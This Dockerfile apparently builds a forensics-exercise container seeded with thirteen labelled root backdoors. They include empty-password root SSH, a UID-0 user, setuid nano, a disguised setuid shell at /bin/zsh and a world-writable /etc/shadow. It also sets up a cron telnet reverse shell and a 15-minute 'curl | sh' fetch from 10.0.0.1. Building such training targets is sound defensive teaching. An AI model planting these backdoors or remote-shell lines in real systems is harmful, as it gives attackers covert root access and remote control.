# Dockerfile for forensic event
FROM alpine:latest

LABEL version="1.0"
LABEL description="Find the root-shell backdoors."

# Update Alpine Linux Package Manager and install programms
RUN apk update
RUN apk add --no-cache bash openssh-server openrc nano inetutils-telnet curl
RUN rm  -rf /tmp/* /var/cache/apk/*

# 1) Backdoor SSH config
# copy ssh-config with empty passwords and allow root
COPY sshd_config /etc/ssh/
RUN cd /etc/ssh
RUN ssh-keygen -A
# add files for service rc, so ssh deamon will start
RUN rc-status
RUN touch /run/openrc/softlevel
# expose SSH
EXPOSE 22

# 2) Backdoor user id 0 to become root
# add user hans with passwd "test", add to sudoers
RUN adduser --disabled-password hans
RUN echo "hans:$6$S9/8sCwzaioLtsbY$RQlD2dmxH5.HQjvbA9oIG17UBS4bD649z/pT7IvlL4iPOMxqkDq0aayPZRkDuK1sOEA9FUcHObk0LOuA.GC9E1" | chpasswd -e > /dev/null 2>&1
RUN echo "hans ALL=NOPASSWD: ALL" >> /etc/sudoers
# override id, to become root
RUN sed -i 's/1000/0/g' /etc/passwd

# 3) Backdoor root passwd and loginable
# make root a loginable user, passwd is "test"
RUN sed -i '/root\:x/root\:\$\6\$u\4sZiVzNmQLKsDdL\$Vr\7r\4neRMn\1QpG\2\6EfzuDM\.\3gjDFNdtgW\4IT\4HV\8XY/okflvFycHvtyTUG\2u.x\9AiAD\.HSW\1y\5dx\7fH\6\3BWYe\0/' /etc/shadow

# 4) Backdoor new user with sudo rights
# add user otto with passwd "test", add to sudoers
RUN adduser --disabled-password otto
RUN echo "otto:$6$u4sZiVzNmQLKsDdL$Vr7r4neRMn1QpG26EfzuDM.3gjDFNdtgW4IT4HV8XY/okflvFycHvtyTUG2u.x9AiAD.HSW1y5dx7fH63BWYe0" | chpasswd -e > /dev/null 2>&1
RUN echo "otto ALL=NOPASSWD: ALL" >> /etc/sudoers

# 5) Backdoor edit files with root rights
# setuid
RUN chmod ug+s /usr/bin/nano

# 6) Backdoor telnet reverse shell as cronjob
# add telnet shell in cron boot conceiled as webserver
# run:
#   nc -lvp 80
#   nc -lvp 443
# on attacker machine with ip 10.0.0.1
RUN echo "@reboot telnet 10.0.0.1 80 | /bin/sh | telnet 10.0.0.1 443" >> /etc/crontabs/root

# 7) Backdoor SSH key
# create SSH-Key for login into root
# passwd for ssh key is "i_use_no_passwd"
RUN mkdir /home/otto/.ssh
RUN ssh-keygen -t ed25519 -f /home/otto/.ssh/ed-ssh -q -N i_use_no_passwd
RUN mkdir /root/.ssh
RUN cp /home/otto/.ssh/ed-ssh.pub /root/.ssh/authorized_keys
RUN chown otto:otto -R /home/otto/.ssh

# 8) Backdoor /root/.bashrc
# add alias to bash to give us root by changing id in /etc/passwd
COPY .bashrc /root/.bashrc

# 9) Backdoor like 8) just with .profile
# give root over id change when login is happening with root-user
COPY .bashrc /root/.profile

# 10) Backdoor get commands via webrequest
# download update-file from webserver and execute each 15 minutes
RUN echo "curl http://10.0.0.1/update | sh" >> /etc/periodic/15min/update.sh
RUN chmod a+x /etc/periodic/15min/update.sh

# 11) Backdoor mini C-Programm
# set uid and gid to root, then start shell, hide as Z-Shell
# commands are in one layer, so image will be smaller, gcc and libs are not needed after compile
RUN apk add gcc musl-dev && \
echo 'int main() { setresuid(0,0,0); setresgid(0,0,0); system("/bin/sh"); }' | gcc -o /bin/zsh -xc - && \
chown root:root /bin/zsh && \
chmod ug+s /bin/zsh && \
# cleanup \
apk --no-cache del gcc musl-dev && \
apk --no-cache cache clean

# 12) Backdoor "You can edit. And you can edit. Everybody can edit."
# everybody can edit /etc/shadow
RUN chmod o+rw /etc/shadow

# 13) Backdoor group member
# user hans is member from shadow group
RUN adduser hans shadow

# Run the bash terminal on container startup
CMD service sshd start && /bin/sh
